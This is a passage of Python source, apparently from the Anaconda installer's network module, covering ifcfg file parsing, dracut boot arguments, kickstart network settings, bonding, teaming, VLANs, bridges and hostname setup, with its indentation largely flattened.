for ip in getIPs():
if ip not in ("127.0.0.1", "::1"):
return ip
return None
def netmask2prefix(netmask):
""" Convert netmask to prefix (CIDR bits) """
prefix = 0
while prefix < 33:
if (prefix2netmask(prefix) == netmask):
return prefix
prefix += 1
return prefix
def prefix2netmask(prefix):
""" Convert prefix (CIDR bits) to netmask """
_bytes = []
for _i in range(4):
if prefix >= 8:
_bytes.append(255)
prefix -= 8
else:
_bytes.append(256 - 2**(8-prefix))
prefix = 0
netmask = ".".join(str(byte) for byte in _bytes)
return netmask
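# Round-trip examples for the two converters above:
#   prefix2netmask(24) -> "255.255.255.0"
#   prefix2netmask(20) -> "255.255.240.0"
#   netmask2prefix("255.255.255.0") -> 24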
def getHostname():
""" Try to determine what the hostname should be for this system """
hn = None
# First address (we prefer ipv4) of last device (as it used to be) wins
for dev in nm.nm_activated_devices():
addrs = (nm.nm_device_ip_addresses(dev, version=4) +
nm.nm_device_ip_addresses(dev, version=6))
for ipaddr in addrs:
try:
hinfo = socket.gethostbyaddr(ipaddr)
except socket.herror as e:
log.debug("Exception caught trying to get host name of %s: %s", ipaddr, e)
else:
if len(hinfo) == 3:
hn = hinfo[0]
break
if not hn or hn in ('(none)', 'localhost', 'localhost.localdomain'):
hn = socket.gethostname()
if not hn or hn in ('(none)', 'localhost', 'localhost.localdomain'):
hn = DEFAULT_HOSTNAME
return hn
def logIfcfgFile(path, message=""):
""" Log content of network ifcfg file.
:param str path: path to the ifcfg file
:param str message: optional message appended to the log
"""
content = ""
    if os.access(path, os.R_OK):
        with open(path, 'r') as f:
            content = f.read()
else:
content = "file not found"
ifcfglog.debug("%s%s:\n%s", message, path, content)
def _ifcfg_files(directory):
rv = []
for name in os.listdir(directory):
if name.startswith("ifcfg-"):
if name == "ifcfg-lo":
continue
rv.append(os.path.join(directory, name))
return rv
def logIfcfgFiles(message=""):
""" Log contents of all network ifcfg files.
:param str message: append message to the log
"""
ifcfglog.debug("content of files (%s):", message)
for path in _ifcfg_files(netscriptsDir):
ifcfglog.debug("%s:", path)
with open(path, "r") as f:
for line in f:
ifcfglog.debug(" %s", line.strip())
ifcfglog.debug("all settings: %s", nm.nm_get_all_settings())
class IfcfgFile(SimpleConfigFile):
def __init__(self, filename):
SimpleConfigFile.__init__(self, always_quote=True, filename=filename)
self._dirty = False
def read(self, filename=None):
self.reset()
ifcfglog.debug("IfcfFile.read %s", self.filename)
SimpleConfigFile.read(self)
self._dirty = False
def write(self, filename=None, use_tmp=False):
if self._dirty or filename:
# ifcfg-rh is using inotify IN_CLOSE_WRITE event so we don't use
# temporary file for new configuration
ifcfglog.debug("IfcfgFile.write %s:\n%s", self.filename, self.__str__())
SimpleConfigFile.write(self, filename, use_tmp=use_tmp)
self._dirty = False
def set(self, *args):
for (key, data) in args:
if self.get(key) != data:
break
else:
return
ifcfglog.debug("IfcfgFile.set %s: %s", self.filename, args)
SimpleConfigFile.set(self, *args)
self._dirty = True
def unset(self, *args):
for key in args:
if self.get(key):
self._dirty = True
break
else:
return
ifcfglog.debug("IfcfgFile.unset %s: %s", self.filename, args)
SimpleConfigFile.unset(self, *args)
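# Typical IfcfgFile usage (mirroring autostartFCoEDevices below): read, mutate,
# write back; set()/unset() mark the object dirty only when a value actually
# changes, so write() is a no-op for untouched files.
#   ifcfg = IfcfgFile(path)
#   ifcfg.read()
#   ifcfg.set(('ONBOOT', 'yes'))
#   ifcfg.write()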
def dumpMissingDefaultIfcfgs():
"""
Dump missing default ifcfg file for wired devices.
For default auto connections created by NM upon start - which happens
in case of missing ifcfg file - rename the connection using device name
and dump its ifcfg file. (For server, default auto connections will
be turned off in NetworkManager.conf.)
The connection id (and consequently ifcfg file) is set to device name.
:return: list of devices for which ifcfg file was dumped.
"""
rv = []
for devname in nm.nm_devices():
# for each ethernet device
# FIXME add more types (infiniband, bond...?)
if not nm.nm_device_type_is_ethernet(devname):
continue
# check that device has connection without ifcfg file
try:
nm.nm_device_setting_value(devname, "connection", "uuid")
except nm.SettingsNotFoundError:
continue
if find_ifcfg_file_of_device(devname):
continue
try:
nm.nm_update_settings_of_device(devname, [['connection', 'id', devname, None]])
log.debug("network: dumping ifcfg file for default autoconnection on %s", devname)
except nm.SettingsNotFoundError:
log.debug("network: no ifcfg file for %s", devname)
rv.append(devname)
return rv
def dracutSetupArgs(networkStorageDevice):
if networkStorageDevice.nic == "default" or ":" in networkStorageDevice.nic:
if getattr(networkStorageDevice, 'ibft', False):
nic = ibftIface()
else:
nic = ifaceForHostIP(networkStorageDevice.host_address)
if not nic:
return ""
else:
nic = networkStorageDevice.nic
if nic not in nm.nm_devices():
log.error('Unknown network interface: %s', nic)
return ""
ifcfg_path = find_ifcfg_file_of_device(nic)
if not ifcfg_path:
log.error("dracutSetupArgs: can't find ifcfg file for %s", nic)
return ""
ifcfg = IfcfgFile(ifcfg_path)
ifcfg.read()
return dracutBootArguments(nic,
ifcfg,
networkStorageDevice.host_address,
getHostname())
def dracutBootArguments(devname, ifcfg, storage_ipaddr, hostname=None):
netargs = set()
if ifcfg.get('BOOTPROTO') == 'ibft':
netargs.add("ip=ibft")
elif storage_ipaddr:
if hostname is None:
hostname = ""
# if using ipv6
if ':' in storage_ipaddr:
if ifcfg.get('DHCPV6C') == "yes":
# XXX combination with autoconf not yet clear,
# support for dhcpv6 is not yet implemented in NM/ifcfg-rh
netargs.add("ip=%s:dhcp6" % devname)
elif ifcfg.get('IPV6_AUTOCONF') == "yes":
netargs.add("ip=%s:auto6" % devname)
elif ifcfg.get('IPV6ADDR'):
ipaddr = "[%s]" % ifcfg.get('IPV6ADDR')
if ifcfg.get('IPV6_DEFAULTGW'):
gateway = "[%s]" % ifcfg.get('IPV6_DEFAULTGW')
else:
gateway = ""
netargs.add("ip=%s::%s::%s:%s:none" % (ipaddr, gateway,
hostname, devname))
else:
if iutil.lowerASCII(ifcfg.get('bootproto')) == 'dhcp':
netargs.add("ip=%s:dhcp" % devname)
else:
cfgidx = ''
if ifcfg.get('IPADDR0'):
cfgidx = '0'
if ifcfg.get('GATEWAY%s' % cfgidx):
gateway = ifcfg.get('GATEWAY%s' % cfgidx)
else:
gateway = ""
netmask = ifcfg.get('NETMASK%s' % cfgidx)
prefix = ifcfg.get('PREFIX%s' % cfgidx)
if not netmask and prefix:
netmask = prefix2netmask(int(prefix))
ipaddr = ifcfg.get('IPADDR%s' % cfgidx)
netargs.add("ip=%s::%s:%s:%s:%s:none" %
(ipaddr, gateway, netmask, hostname, devname))
hwaddr = ifcfg.get("HWADDR")
if hwaddr:
netargs.add("ifname=%s:%s" % (devname, hwaddr.lower()))
if ifcfg.get("TYPE") == "Team" or ifcfg.get("DEVICETYPE") == "Team":
slaves = get_team_slaves([devname, ifcfg.get("UUID")])
netargs.add("team=%s:%s" % (devname,
",".join(dev for dev, _cfg in slaves)))
nettype = ifcfg.get("NETTYPE")
subchannels = ifcfg.get("SUBCHANNELS")
if blivet.arch.is_s390() and nettype and subchannels:
znet = "rd.znet=%s,%s" % (nettype, subchannels)
options = ifcfg.get("OPTIONS").strip("'\"")
if options:
options = filter(lambda x: x != '', options.split(' '))
znet += ",%s" % (','.join(options))
netargs.add(znet)
return netargs
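# Sample dracut fragments produced above (illustrative values):
#   DHCP ipv4:   ip=em1:dhcp
#   static ipv4: ip=10.34.102.244::10.34.102.1:255.255.255.0:myhost:em1:none
#   team device: team=team0:em1,em2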
def _get_ip_setting_values_from_ksdata(networkdata):
values = []
# ipv4 settings
method4 = "auto"
if networkdata.bootProto == "static":
method4 = "manual"
values.append(["ipv4", "method", method4, "s"])
if method4 == "manual":
addr4 = nm.nm_ipv4_to_dbus_int(networkdata.ip)
if networkdata.gateway:
gateway4 = nm.nm_ipv4_to_dbus_int(networkdata.gateway)
else:
gateway4 = 0 # will be ignored by NetworkManager
prefix4 = netmask2prefix(networkdata.netmask)
values.append(["ipv4", "addresses", [[addr4, prefix4, gateway4]], "aau"])
# ipv6 settings
if networkdata.noipv6:
method6 = "ignore"
else:
if not networkdata.ipv6:
method6 = "auto"
elif networkdata.ipv6 == "auto":
method6 = "auto"
elif networkdata.ipv6 == "dhcp":
method6 = "dhcp"
else:
method6 = "manual"
values.append(["ipv6", "method", method6, "s"])
if method6 == "manual":
addr6, _slash, prefix6 = networkdata.ipv6.partition("/")
if prefix6:
prefix6 = int(prefix6)
else:
prefix6 = 64
addr6 = nm.nm_ipv6_to_dbus_ay(addr6)
if networkdata.ipv6gateway:
gateway6 = nm.nm_ipv6_to_dbus_ay(networkdata.ipv6gateway)
else:
gateway6 = [0] * 16
values.append(["ipv6", "addresses", [(addr6, prefix6, gateway6)], "a(ayuay)"])
# nameservers
nss4 = []
nss6 = []
if networkdata.nameserver:
for ns in [str.strip(i) for i in networkdata.nameserver.split(",")]:
if check_ip_address(ns, version=6):
nss6.append(nm.nm_ipv6_to_dbus_ay(ns))
elif check_ip_address(ns, version=4):
nss4.append(nm.nm_ipv4_to_dbus_int(ns))
else:
log.error("IP address %s is not valid", ns)
values.append(["ipv4", "dns", nss4, "au"])
values.append(["ipv6", "dns", nss6, "aay"])
return values
def update_settings_with_ksdata(devname, networkdata):
new_values = _get_ip_setting_values_from_ksdata(networkdata)
new_values.append(['connection', 'autoconnect', networkdata.onboot, None])
uuid = nm.nm_device_setting_value(devname, "connection", "uuid")
nm.nm_update_settings_of_device(devname, new_values)
return uuid
def bond_options_ksdata_to_dbus(opts_str):
retval = {}
for option in opts_str.split(";" if ';' in opts_str else ","):
key, _sep, value = option.partition("=")
retval[key] = value
return retval
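# Example: both "mode=active-backup;primary=em1" and "mode=active-backup,primary=em1"
# parse to {'mode': 'active-backup', 'primary': 'em1'}; ';' wins when present,
# which lets individual option values contain commas.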
def add_connection_for_ksdata(networkdata, devname):
added_connections = []
con_uuid = str(uuid4())
values = _get_ip_setting_values_from_ksdata(networkdata)
# HACK preventing NM to autoactivate the connection
#values.append(['connection', 'autoconnect', networkdata.onboot, 'b'])
values.append(['connection', 'autoconnect', False, 'b'])
values.append(['connection', 'uuid', con_uuid, 's'])
# type "bond"
if networkdata.bondslaves:
# bond connection is autoactivated
values.append(['connection', 'type', 'bond', 's'])
values.append(['connection', 'id', devname, 's'])
values.append(['bond', 'interface-name', devname, 's'])
options = bond_options_ksdata_to_dbus(networkdata.bondopts)
values.append(['bond', 'options', options, 'a{ss}'])
for slave in networkdata.bondslaves.split(","):
suuid = _add_slave_connection('bond', slave, devname, networkdata.activate)
added_connections.append((suuid, slave))
dev_spec = None
# type "team"
elif networkdata.teamslaves:
values.append(['connection', 'type', 'team', 's'])
values.append(['connection', 'id', devname, 's'])
values.append(['team', 'interface-name', devname, 's'])
values.append(['team', 'config', networkdata.teamconfig, 's'])
for (slave, cfg) in networkdata.teamslaves:
svalues = [['team-port', 'config', cfg, 's']]
suuid = _add_slave_connection('team', slave, devname, networkdata.activate, svalues)
added_connections.append((suuid, slave))
dev_spec = None
# type "vlan"
elif networkdata.vlanid:
values.append(['vlan', 'parent', networkdata.parent, 's'])
values.append(['connection', 'type', 'vlan', 's'])
values.append(['connection', 'id', devname, 's'])
values.append(['vlan', 'interface-name', devname, 's'])
values.append(['vlan', 'id', int(networkdata.vlanid), 'u'])
dev_spec = None
# type "bridge"
elif networkdata.bridgeslaves:
# bridge connection is autoactivated
values.append(['connection', 'type', 'bridge', 's'])
values.append(['connection', 'id', devname, 's'])
values.append(['bridge', 'interface-name', devname, 's'])
for opt in networkdata.bridgeopts.split(","):
key, _sep, value = opt.partition("=")
if key == "stp":
if value == "yes":
values.append(['bridge', key, True, 'b'])
elif value == "no":
values.append(['bridge', key, False, 'b'])
continue
try:
value = int(value)
except ValueError:
log.error("Invalid bridge option %s", opt)
continue
values.append(['bridge', key, int(value), 'u'])
for slave in networkdata.bridgeslaves.split(","):
suuid = _add_slave_connection('bridge', slave, devname, networkdata.activate)
added_connections.append((suuid, slave))
dev_spec = None
# type "infiniband"
elif nm.nm_device_type_is_infiniband(devname):
values.append(['infiniband', 'transport-mode', 'datagram', 's'])
values.append(['connection', 'type', 'infiniband', 's'])
values.append(['connection', 'id', devname, 's'])
values.append(['connection', 'interface-name', devname, 's'])
dev_spec = None
# type "802-3-ethernet"
else:
mac = _bound_hwaddr_of_device(devname)
if mac:
mac = [int(b, 16) for b in mac.split(":")]
values.append(['802-3-ethernet', 'mac-address', mac, 'ay'])
values.append(['connection', 'type', '802-3-ethernet', 's'])
values.append(['connection', 'id', devname, 's'])
values.append(['connection', 'interface-name', devname, 's'])
if blivet.arch.is_s390():
# Add s390 settings
s390cfg = _get_s390_settings(devname)
if s390cfg['SUBCHANNELS']:
subchannels = s390cfg['SUBCHANNELS'].split(",")
values.append(['802-3-ethernet', 's390-subchannels', subchannels, 'as'])
if s390cfg['NETTYPE']:
values.append(['802-3-ethernet', 's390-nettype', s390cfg['NETTYPE'], 's'])
if s390cfg['OPTIONS']:
opts = s390cfg['OPTIONS'].split(" ")
opts_dict = {k:v for k,v in (o.split("=") for o in opts)}
values.append(['802-3-ethernet', 's390-options', opts_dict, 'a{ss}'])
dev_spec = devname
try:
nm.nm_add_connection(values)
except nm.BondOptionsError as e:
log.error(e)
return []
added_connections.insert(0, (con_uuid, dev_spec))
return added_connections
def _bound_hwaddr_of_device(devname):
"""Return hwaddr of the device if it's bound by ifname= dracut boot option
For example ifname=ens3:f4:ce:46:2c:44:7a should bind the device name ens3
to the MAC address (and rename the device in initramfs eventually). If
hwaddress of the device devname is the same as the MAC address, its value
is returned.
:param devname: device name
:type devname: str
:return: hwaddress of the device if bound, or None
:rtype: str or None
"""
ifname_values = flags.cmdline.get("ifname", "").split()
for ifname in ifname_values:
dev, mac = ifname.split(":", 1)
if dev == devname:
try:
hwaddr = nm.nm_device_perm_hwaddress(devname)
except nm.PropertyNotFoundError:
continue
else:
if mac.upper() == hwaddr.upper():
return hwaddr.upper()
else:
log.warning("network: ifname=%s does not match device's hwaddr %s", ifname, hwaddr)
return None
def _get_s390_settings(devname):
cfg = {
'SUBCHANNELS': '',
'NETTYPE': '',
'OPTIONS': ''
}
subchannels = []
for symlink in sorted(glob.glob("/sys/class/net/%s/device/cdev[0-9]*" % devname)):
subchannels.append(os.path.basename(os.readlink(symlink)))
if not subchannels:
return cfg
cfg['SUBCHANNELS'] = ','.join(subchannels)
## cat /etc/ccw.conf
#qeth,0.0.0900,0.0.0901,0.0.0902,layer2=0,portname=FOOBAR,portno=0
#
#SUBCHANNELS="0.0.0900,0.0.0901,0.0.0902"
#NETTYPE="qeth"
#OPTIONS="layer2=1 portname=FOOBAR portno=0"
if not os.path.exists('/run/install/ccw.conf'):
return cfg
with open('/run/install/ccw.conf') as f:
# pylint: disable=redefined-outer-name
for line in f:
if cfg['SUBCHANNELS'] in line:
items = line.strip().split(',')
cfg['NETTYPE'] = items[0]
cfg['OPTIONS'] = " ".join(i for i in items[1:] if '=' in i)
break
return cfg
def _add_slave_connection(slave_type, slave, master, activate, values=None):
values = values or []
#slave_name = "%s slave %d" % (devname, slave_idx)
slave_name = slave
suuid = str(uuid4())
# assume ethernet, TODO: infiniband, wifi, vlan
values.append(['connection', 'uuid', suuid, 's'])
values.append(['connection', 'id', slave_name, 's'])
values.append(['connection', 'slave-type', slave_type, 's'])
values.append(['connection', 'master', master, 's'])
values.append(['connection', 'type', '802-3-ethernet', 's'])
mac = nm.nm_device_perm_hwaddress(slave)
mac = [int(b, 16) for b in mac.split(":")]
values.append(['802-3-ethernet', 'mac-address', mac, 'ay'])
# disconnect slaves
if activate:
try:
nm.nm_disconnect_device(slave)
except nm.DeviceNotActiveError:
pass
# remove ifcfg file
ifcfg_path = find_ifcfg_file_of_device(slave)
if ifcfg_path and os.access(ifcfg_path, os.R_OK):
os.unlink(ifcfg_path)
nm.nm_add_connection(values)
return suuid
def ksdata_from_ifcfg(devname, uuid=None):
if devname not in nm.nm_devices():
return None
if nm.nm_device_is_slave(devname):
return None
if nm.nm_device_type_is_wifi(devname):
# wifi from kickstart is not supported yet
return None
if not uuid:
# Find ifcfg file for the device.
# If the device is active, use uuid of its active connection.
uuid = nm.nm_device_active_con_uuid(devname)
if uuid:
ifcfg_path = find_ifcfg_file([("UUID", uuid)])
else:
# look it up by other values depending on its type
ifcfg_path = find_ifcfg_file_of_device(devname)
if not ifcfg_path:
return None
ifcfg = IfcfgFile(ifcfg_path)
ifcfg.read()
nd = ifcfg_to_ksdata(ifcfg, devname)
if not nd:
return None
if nm.nm_device_type_is_ethernet(devname):
nd.device = devname
elif nm.nm_device_type_is_wifi(devname):
nm.device = ""
elif nm.nm_device_type_is_bond(devname):
nd.device = devname
elif nm.nm_device_type_is_team(devname):
nd.device = devname
elif nm.nm_device_type_is_bridge(devname):
nd.device = devname
elif nm.nm_device_type_is_vlan(devname):
if devname != default_ks_vlan_interface_name(nd.device, nd.vlanid):
nd.interfacename = devname
return nd
def ifcfg_to_ksdata(ifcfg, devname):
from pyanaconda.kickstart import AnacondaKSHandler
handler = AnacondaKSHandler()
kwargs = {}
# no network command for bond slaves
if ifcfg.get("MASTER"):
return None
# no network command for team slaves
if ifcfg.get("TEAM_MASTER"):
return None
# no network command for bridge slaves
if ifcfg.get("BRIDGE"):
return None
# ipv4 and ipv6
if ifcfg.get("ONBOOT") and ifcfg.get("ONBOOT") == "no":
kwargs["onboot"] = False
if ifcfg.get('MTU') and ifcfg.get('MTU') != "0":
kwargs["mtu"] = ifcfg.get('MTU')
# ipv4
if not ifcfg.get('BOOTPROTO'):
kwargs["noipv4"] = True
else:
if iutil.lowerASCII(ifcfg.get('BOOTPROTO')) == 'dhcp':
kwargs["bootProto"] = "dhcp"
if ifcfg.get('DHCPCLASS'):
kwargs["dhcpclass"] = ifcfg.get('DHCPCLASS')
elif ifcfg.get('IPADDR'):
kwargs["bootProto"] = "static"
kwargs["ip"] = ifcfg.get('IPADDR')
netmask = ifcfg.get('NETMASK')
prefix = ifcfg.get('PREFIX')
if not netmask and prefix:
netmask = prefix2netmask(int(prefix))
if netmask:
kwargs["netmask"] = netmask
# note that --gateway is common for ipv4 and ipv6
if ifcfg.get('GATEWAY'):
kwargs["gateway"] = ifcfg.get('GATEWAY')
elif ifcfg.get('IPADDR0'):
kwargs["bootProto"] = "static"
kwargs["ip"] = ifcfg.get('IPADDR0')
prefix = ifcfg.get('PREFIX0')
if prefix:
netmask = prefix2netmask(int(prefix))
kwargs["netmask"] = netmask
# note that --gateway is common for ipv4 and ipv6
if ifcfg.get('GATEWAY0'):
kwargs["gateway"] = ifcfg.get('GATEWAY0')
# ipv6
if (not ifcfg.get('IPV6INIT') or
ifcfg.get('IPV6INIT') == "no"):
kwargs["noipv6"] = True
else:
if ifcfg.get('IPV6_AUTOCONF') in ("yes", ""):
kwargs["ipv6"] = "auto"
else:
if ifcfg.get('IPV6ADDR'):
kwargs["ipv6"] = ifcfg.get('IPV6ADDR')
if ifcfg.get('IPV6_DEFAULTGW') \
and ifcfg.get('IPV6_DEFAULTGW') != "::":
kwargs["ipv6gateway"] = ifcfg.get('IPV6_DEFAULTGW')
if ifcfg.get('DHCPV6C') == "yes":
kwargs["ipv6"] = "dhcp"
# ipv4 and ipv6
dnsline = ''
for key in ifcfg.info.keys():
if iutil.upperASCII(key).startswith('DNS'):
if dnsline == '':
dnsline = ifcfg.get(key)
else:
dnsline += "," + ifcfg.get(key)
if dnsline:
kwargs["nameserver"] = dnsline
if ifcfg.get("ETHTOOL_OPTS"):
kwargs["ethtool"] = ifcfg.get("ETHTOOL_OPTS")
if ifcfg.get("ESSID"):
kwargs["essid"] = ifcfg.get("ESSID")
# hostname
if ifcfg.get("DHCP_HOSTNAME"):
kwargs["hostname"] = ifcfg.get("DHCP_HOSTNAME")
# bonding
# FIXME: dracut has only BOND_OPTS
if ifcfg.get("BONDING_MASTER") == "yes" or ifcfg.get("TYPE") == "Bond":
slaves = get_slaves_from_ifcfgs("MASTER", [devname, ifcfg.get("UUID")])
if slaves:
kwargs["bondslaves"] = ",".join(slaves)
bondopts = ifcfg.get("BONDING_OPTS")
if bondopts:
sep = ","
if sep in bondopts:
sep = ";"
kwargs["bondopts"] = sep.join(bondopts.split())
# vlan
if ifcfg.get("VLAN") == "yes" or ifcfg.get("TYPE") == "Vlan":
kwargs["device"] = ifcfg.get("PHYSDEV")
kwargs["vlanid"] = ifcfg.get("VLAN_ID")
# bridging
if ifcfg.get("TYPE") == "Bridge":
slaves = get_slaves_from_ifcfgs("BRIDGE", [devname, ifcfg.get("UUID")])
if slaves:
kwargs["bridgeslaves"] = ",".join(slaves)
bridgeopts = ifcfg.get("BRIDGING_OPTS").replace('_', '-').split()
if ifcfg.get("STP"):
bridgeopts.append("%s=%s" % ("stp", ifcfg.get("STP")))
if ifcfg.get("DELAY"):
bridgeopts.append("%s=%s" % ("forward-delay", ifcfg.get("DELAY")))
if bridgeopts:
kwargs["bridgeopts"] = ",".join(bridgeopts)
# pylint: disable=no-member
nd = handler.NetworkData(**kwargs)
# teaming
if ifcfg.get("TYPE") == "Team" or ifcfg.get("DEVICETYPE") == "Team":
slaves = get_team_slaves([devname, ifcfg.get("UUID")])
for dev, cfg in slaves:
nd.teamslaves.append((dev, cfg))
teamconfig = nm.nm_device_setting_value(devname, "team", "config")
if teamconfig:
nd.teamconfig = teamconfig
return nd
def hostname_ksdata(hostname):
from pyanaconda.kickstart import AnacondaKSHandler
handler = AnacondaKSHandler()
# pylint: disable=no-member
return handler.NetworkData(hostname=hostname, bootProto="")
def find_ifcfg_file_of_device(devname, root_path=""):
ifcfg_path = None
if devname not in nm.nm_devices():
return None
if nm.nm_device_type_is_wifi(devname):
ssid = nm.nm_device_active_ssid(devname)
if ssid:
ifcfg_path = find_ifcfg_file([("ESSID", ssid)])
elif nm.nm_device_type_is_bond(devname):
ifcfg_path = find_ifcfg_file([("DEVICE", devname)])
elif nm.nm_device_type_is_team(devname):
ifcfg_path = find_ifcfg_file([("DEVICE", devname)])
elif nm.nm_device_type_is_vlan(devname):
ifcfg_path = find_ifcfg_file([("DEVICE", devname)])
elif nm.nm_device_type_is_bridge(devname):
ifcfg_path = find_ifcfg_file([("DEVICE", devname)])
elif nm.nm_device_type_is_infiniband(devname):
ifcfg_path = find_ifcfg_file([("DEVICE", devname)])
elif nm.nm_device_type_is_ethernet(devname):
try:
hwaddr = nm.nm_device_perm_hwaddress(devname)
except nm.PropertyNotFoundError:
hwaddr = None
if hwaddr:
hwaddr_check = lambda mac: mac.upper() == hwaddr.upper()
nonempty = lambda x: x
            # slave configuration created in GUI takes precedence
ifcfg_path = find_ifcfg_file([("HWADDR", hwaddr_check),
("MASTER", nonempty)],
root_path)
if not ifcfg_path:
ifcfg_path = find_ifcfg_file([("HWADDR", hwaddr_check),
("TEAM_MASTER", nonempty)],
root_path)
if not ifcfg_path:
ifcfg_path = find_ifcfg_file([("HWADDR", hwaddr_check),
("BRIDGE", nonempty)],
root_path)
if not ifcfg_path:
ifcfg_path = find_ifcfg_file([("HWADDR", hwaddr_check)], root_path)
if not ifcfg_path:
ifcfg_path = find_ifcfg_file([("DEVICE", devname)], root_path)
if not ifcfg_path:
if blivet.arch.is_s390():
# s390 setting generated in dracut with net.ifnames=0
# has neither DEVICE nor HWADDR (#1249750)
ifcfg_path = find_ifcfg_file([("NAME", devname)], root_path)
else:
log.debug("network: ifcfg file for %s not found", devname)
return ifcfg_path
def find_ifcfg_file(values, root_path=""):
for filepath in _ifcfg_files(os.path.normpath(root_path+netscriptsDir)):
ifcfg = IfcfgFile(filepath)
ifcfg.read()
for key, value in values:
if callable(value):
if not value(ifcfg.get(key)):
break
else:
if ifcfg.get(key) != value:
break
else:
return filepath
return None
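# Usage sketch: each (KEY, match) pair is a literal value or a predicate, and
# every pair must match for a file path to be returned, e.g.:
#   find_ifcfg_file([("DEVICE", "em1")])
#   find_ifcfg_file([("HWADDR", lambda mac: mac.upper() == "AA:BB:CC:DD:EE:FF")])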
def get_slaves_from_ifcfgs(master_option, master_specs):
"""List of slaves of master specified by master_specs in master_option.
master_option is ifcfg option containing spec of master
master_specs is a list containing device name of master (dracut)
and/or master's connection uuid
"""
slaves = []
for filepath in _ifcfg_files(netscriptsDir):
ifcfg = IfcfgFile(filepath)
ifcfg.read()
master = ifcfg.get(master_option)
if master in master_specs:
device = ifcfg.get("DEVICE")
if device:
slaves.append(device)
else:
hwaddr = ifcfg.get("HWADDR")
for devname in nm.nm_devices():
try:
h = nm.nm_device_property(devname, "PermHwAddress")
except nm.PropertyNotFoundError:
log.debug("can't get PermHwAddress of devname %s", devname)
continue
if h.upper() == hwaddr.upper():
slaves.append(devname)
break
return slaves
def get_team_slaves(master_specs):
"""List of slaves of master specified by master_specs (name, opts).
master_specs is a list containing device name of master (dracut)
and/or master's connection uuid
"""
slaves = []
for master in master_specs:
slave_settings = nm.nm_get_settings(master, "connection", "master")
for settings in slave_settings:
try:
cfg = settings["team-port"]["config"]
except KeyError:
cfg = ""
devname = settings["connection"].get("interface-name")
#nm-c-e doesn't save device name
# TODO: wifi, infiniband
if not devname:
ty = settings["connection"]["type"]
if ty == "802-3-ethernet":
hwaddr = settings["802-3-ethernet"]["mac-address"]
hwaddr = ":".join("%02X" % b for b in hwaddr)
devname = nm.nm_hwaddr_to_device_name(hwaddr)
if devname:
slaves.append((devname, cfg))
else:
uuid = settings["connection"].get("uuid")
log.debug("network: can't get team slave device name of %s", uuid)
return slaves
def ibftIface():
iface = ""
ipopt = flags.cmdline.get('ip')
# Examples (dhcp, static):
# ibft0:dhcp
# 10.34.102.244::10.34.102.54:255.255.255.0::ibft0:none
if ipopt:
for item in ipopt.split(":"):
if item.startswith('ibft'):
iface = item
break
return iface
def ifaceForHostIP(host):
route = iutil.execWithCapture("ip", ["route", "get", "to", host])
if not route:
log.error("Could not get interface for route to %s", host)
return ""
routeInfo = route.split()
if routeInfo[0] != host or len(routeInfo) < 5 or \
"dev" not in routeInfo or routeInfo.index("dev") > 3:
log.error('Unexpected "ip route get to %s" reply: %s', host, routeInfo)
return ""
return routeInfo[routeInfo.index("dev") + 1]
def default_route_device(family="inet"):
routes = iutil.execWithCapture("ip", [ "-f", family, "route", "show"])
if not routes:
log.debug("Could not get default %s route device", family)
return None
for line in routes.split("\n"):
if line.startswith("default"):
parts = line.split()
if len(parts) >= 5 and parts[3] == "dev":
return parts[4]
else:
log.debug("Could not parse default %s route device", family)
return None
return None
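# Parses output lines such as "default via 192.168.1.1 dev em1 proto static":
# parts[3] is the "dev" keyword and parts[4] ("em1") is the returned device.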
def copyFileToPath(fileName, destPath='', overwrite=False):
if not os.path.isfile(fileName):
return False
destfile = os.path.join(destPath, fileName.lstrip('/'))
if (os.path.isfile(destfile) and not overwrite):
return False
if not os.path.isdir(os.path.dirname(destfile)):
iutil.mkdirChain(os.path.dirname(destfile))
shutil.copy(fileName, destfile)
return True
def copyIfcfgFiles(destPath):
files = os.listdir(netscriptsDir)
for cfgFile in files:
if cfgFile.startswith(("ifcfg-", "keys-", "route-")):
srcfile = os.path.join(netscriptsDir, cfgFile)
copyFileToPath(srcfile, destPath)
def copyDhclientConfFiles(destPath):
for devName in nm.nm_devices():
dhclientfile = os.path.join("/etc/dhcp/dhclient-%s.conf" % devName)
copyFileToPath(dhclientfile, destPath)
def ks_spec_to_device_name(ksspec=""):
"""
Find the first network device which matches the kickstart specification.
Will not match derived types such as bonds and vlans.
:param ksspec: kickstart-specified device name
:returns: a string naming a physical device, or "" meaning none matched
:rtype: str
"""
bootif_mac = ''
if ksspec == 'bootif' and "BOOTIF" in flags.cmdline:
bootif_mac = flags.cmdline["BOOTIF"][3:].replace("-", ":").upper()
for dev in sorted(nm.nm_devices()):
# "eth0"
if ksspec == dev:
break
# "link" - match the first device which is plugged (has a carrier)
elif ksspec == 'link':
try:
link_up = nm.nm_device_carrier(dev)
except ValueError as e:
log.debug("ks_spec_to_device_name: %s", e)
continue
if link_up:
ksspec = dev
break
# "XX:XX:XX:XX:XX:XX" (mac address)
elif ':' in ksspec:
try:
hwaddr = nm.nm_device_valid_hwaddress(dev)
except ValueError as e:
log.debug("ks_spec_to_device_name: %s", e)
continue
if ksspec.lower() == hwaddr.lower():
ksspec = dev
break
# "bootif" and BOOTIF==XX:XX:XX:XX:XX:XX
elif ksspec == 'bootif':
try:
hwaddr = nm.nm_device_valid_hwaddress(dev)
except ValueError as e:
log.debug("ks_spec_to_device_name: %s", e)
continue
if bootif_mac.lower() == hwaddr.lower():
ksspec = dev
break
return ksspec
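# Resolution examples: ksspec may be a plain device name ("em1"), "link" (the
# first plugged device wins), a MAC address ("52:54:00:12:34:56"), or "bootif"
# (matched against the BOOTIF= MAC from the boot command line).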
def set_hostname(hn):
if can_touch_runtime_system("set hostname", touch_live=True):
log.info("setting installation environment host name to %s", hn)
iutil.execWithRedirect("hostnamectl", ["set-hostname", hn])
def write_hostname(rootpath, ksdata, overwrite=False):
cfgfile = os.path.normpath(rootpath + hostnameFile)
if (os.path.isfile(cfgfile) and not overwrite):
return False
f = open(cfgfile, "w")
f.write("%s\n" % ksdata.network.hostname)
f.close()
return True
def disableIPV6(rootpath):
cfgfile = os.path.normpath(rootpath + ipv6ConfFile)
if ('noipv6' in flags.cmdline
and all(nm.nm_device_setting_value(dev, "ipv6", "method") == "ignore"
for dev in nm.nm_devices() if nm.nm_device_type_is_ethernet(dev))):
log.info('Disabling ipv6 on target system')
with open(cfgfile, "a") as f:
f.write("# Anaconda disabling ipv6 (noipv6 option)\n")
f.write("net.ipv6.conf.all.disable_ipv6=1\n")
f.write("net.ipv6.conf.default.disable_ipv6=1\n")
def autostartFCoEDevices(rootpath, storage, ksdata):
for devname in nm.nm_devices():
if usedByFCoE(devname, storage):
ifcfg_path = find_ifcfg_file_of_device(devname, root_path=rootpath)
if not ifcfg_path:
